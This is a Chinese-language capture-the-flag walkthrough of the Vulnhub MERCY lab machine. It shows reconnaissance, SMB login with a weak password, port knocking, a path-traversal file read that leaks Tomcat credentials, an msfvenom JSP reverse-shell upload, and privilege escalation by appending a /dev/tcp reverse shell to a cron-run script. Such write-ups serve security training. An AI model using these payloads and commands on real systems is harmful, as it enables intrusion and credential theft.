[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…

2024-07-26 211 0

信息收集

IP Address Opening Ports
192.168.101.151 TCP:80,22,53, 110, 139, 143, 445, 993, 995, 8080

$ $ nmap -p- 192.168.101.151 --min-rate 1000 -sC -sV

PORT     STATE SERVICE     VERSION
53/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: UIDL TOP STLS AUTH-RESP-CODE RESP-CODES PIPELINING SASL CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: LITERAL+ IDLE SASL-IR more listed IMAP4rev1 OK LOGIN-REFERRALS capabilities ENABLE LOGINDISABLEDA0001 STARTTLS post-login have Pre-login ID
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ IDLE more listed IMAP4rev1 SASL-IR LOGIN-REFERRALS AUTH=PLAINA0001 OK capabilities ENABLE post-login have Pre-login ID
995/tcp  open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_pop3-capabilities: UIDL TOP PIPELINING AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) CAPA
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests

本地权限

http://192.168.101.151:8080/robots.txt

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图

$ echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg=='|base64 -d

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图1

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

$ enum4linux 192.168.101.151

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图2

pleadformercy
qiu
thisisasuperduperlonguser
fluffy

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图3

username:qiu
password:password

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password'

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图4

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password' -s qiu -r --depth 10

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图5

$ smbclient //192.168.101.151/qiu -U qiu

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图6

smb: \> lcd ./dev
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图7

$ cat .private/opensesame/config

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图8

通过端口敲门开放SSH和HTTP端口

http:159,27391,4
ssh:17301,28504,9999

$ knock 192.168.101.151 17301 28504 9999 -d 300 -v

$ knock 192.168.101.151 159 27391 4 -d 300 -v

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图9

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图10

$ dirb http://192.168.101.151/

http://192.168.101.151/robots.txt

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图11

http://192.168.101.151/nomercy/

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图12

http://192.168.101.151/mercy/

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图13

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图14

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../etc/passwd

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图15

$ whatweb http://192.168.101.151:8080 -v

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图16

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图17

username:fluffy
password:freakishfluffybunny

username:thisisasuperduperlonguser
password:heartbreakisinevitable

http://192.168.101.151:8080/manager/html

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图18

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.128 LPORT=10032 -f war >reverse.war

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图19

http://192.168.101.151:8080/reverse/

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图20

Local.txt 截屏

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图21

Local.txt 内容

Plz have mercy on me! 🙁 🙁

权限提升

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat7@MERCY:/var/lib/tomcat7$ su fluffy

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图22

$ ls -la /home/fluffy/.private/secrets

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图23

$ ./pspy32

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图24

$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'">>/home/fluffy/.private/secrets/timeclock

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图25

Proof.txt 截屏

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking…插图26

Proof.txt 内容

Congratulations on rooting MERCY. 🙂


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论